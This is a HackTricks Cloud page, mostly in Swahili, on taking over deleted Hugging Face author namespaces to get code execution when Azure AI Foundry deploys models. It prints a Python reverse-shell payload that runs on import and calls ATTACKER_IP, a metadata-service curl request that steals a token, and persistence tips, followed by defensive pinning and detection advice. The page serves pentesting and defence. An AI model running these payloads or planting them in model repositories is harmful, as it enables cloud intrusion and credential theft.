Azure - AI Foundry Post-Exploitation via Hugging Face Model Namespace Reuse

Reading time: 5 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Senario

Azure AI Foundry Model Catalog inajumuisha modeli nyingi za Hugging Face (HF) kwa deployment kwa one-click.
HF model identifiers ni Author/ModelName. Ikiwa mwandishi/taasisi ya HF imefutwa, mtu yeyote anaweza kujisajili upya jina hilo na kuchapisha modeli yenye ModelName ile ile kwenye legacy path.
Pipelines na catalogs ambazo zinavuta kwa jina tu (no commit pinning/integrity) zitatatua kwa attacker-controlled repos. Wakati Azure inapo-deploy modeli, loader code inaweza kutekelezwa katika endpoint environment, ikitoa RCE kwa ruhusa za endpoint hiyo.

Common HF takeover cases:

Ownership deletion: Old path 404 hadi takeover.
Ownership transfer: Old path 307 kwa mwandishi mpya wakati mwandishi wa zamani bado yupo. Ikiwa mwandishi wa zamani baadaye anafutwa na kujisajili upya, redirect inavunjika na repo ya attacker itahudumia kwenye legacy path.

Kutambua Namespaces zinazoweza kutumika tena (HF)

bash

# Check author/org existence
curl -I https://huggingface.co/<Author>        # 200 exists, 404 deleted/available

# Check model path
curl -I https://huggingface.co/<Author>/<ModelName>
# 307 -> redirect (transfer case), 404 -> deleted until takeover

Mtiririko wa Shambulio kutoka Mwisho hadi Mwisho dhidi ya Azure AI Foundry

Katika Model Catalog, tafuta HF models ambazo waandishi wao wa awali wamefutwa au kuhamishwa (old author removed) kwenye HF.
Re-register the abandoned author kwenye HF na uunde tena ModelName.
Chapisha repo ya hasidi yenye loader code inayotekelezwa wakati wa import au inahitaji trust_remote_code=True.
Deploy Author/ModelName ya legacy kutoka Azure AI Foundry. Jukwaa linachukua attacker repo; loader inatekelezwa ndani ya Azure endpoint container/VM, ikitoa RCE na endpoint permissions.

Example payload fragment executed on import (for demonstration only):

python

# __init__.py or a module imported by the model loader
import os, socket, subprocess, threading

def _rs(host, port):
s = socket.socket(); s.connect((host, port))
for fd in (0,1,2):
try:
os.dup2(s.fileno(), fd)
except Exception:
pass
subprocess.call(["/bin/sh","-i"])  # or powershell on Windows images

if os.environ.get("AZUREML_ENDPOINT","1") == "1":
threading.Thread(target=_rs, args=("ATTACKER_IP", 4444), daemon=True).start()

Vidokezo

Deployments za AI Foundry zinazojumuisha HF kwa kawaida hufanya clone na import repo modules zinazoreferenced na config ya model (e.g., auto_map), ambazo zinaweza kusababisha code execution. Some paths require trust_remote_code=True.
Ufikiaji kwa kawaida unalingana na managed identity/service principal permissions za endpoint. Chukulia hii kama initial access foothold kwa ajili ya data access na lateral movement ndani ya Azure.

Post-Exploitation Tips (Azure Endpoint)

Orodhesha environment variables na MSI endpoints kwa tokens:

bash

# Azure Instance Metadata Service (inside Azure compute)
curl -H "Metadata: true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

Kagua uhifadhi uliounganishwa, artifakti za modeli, na huduma za Azure zinazoweza kufikiwa kwa token uliyoipata.
Fikiria persistence kwa kuacha artifakti za modeli zilizochafuliwa ikiwa jukwaa linarudisha tena kutoka HF.

Mwongozo wa Ulinzi kwa Watumiaji wa Azure AI Foundry

Pin models kwa commit wakati wa kupakia kutoka HF:

python

from transformers import AutoModel
m = AutoModel.from_pretrained("Author/ModelName", revision="<COMMIT_HASH>")

Kufanya mirror ya HF models zilizothibitishwa kwenye registry ya ndani inayotegemewa na kuzitekeleza (deploy) kutoka huko.
Endelea kuchunguza codebases na defaults/docstrings/notebooks kwa ajili ya Author/ModelName zilizowekwa hard-coded ambazo zimefutwa/kuhamishwa; sasisha au pin.
Thibitisha uwepo wa author na provenance ya model kabla ya deployment.

Kanuni za Utambuzi (HTTP)

Deleted author: author page inaonyesha 404; legacy model path inaonyesha 404 hadi takeover.
Transferred model: legacy path 307 kuelekea author mpya wakati old author bado ipo; ikiwa old author baadaye imefutwa na kujiandikisha tena, legacy path itatumikia attacker content.

bash

curl -I https://huggingface.co/<OldAuthor>/<ModelName> | egrep "^HTTP|^location"

Marejeleo Yanayohusiana

Tazama mbinu pana na vidokezo juu ya mnyororo wa usambazaji:

Pentesting Cloud Methodology

Marejeleo

tip

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

HackTricks Cloud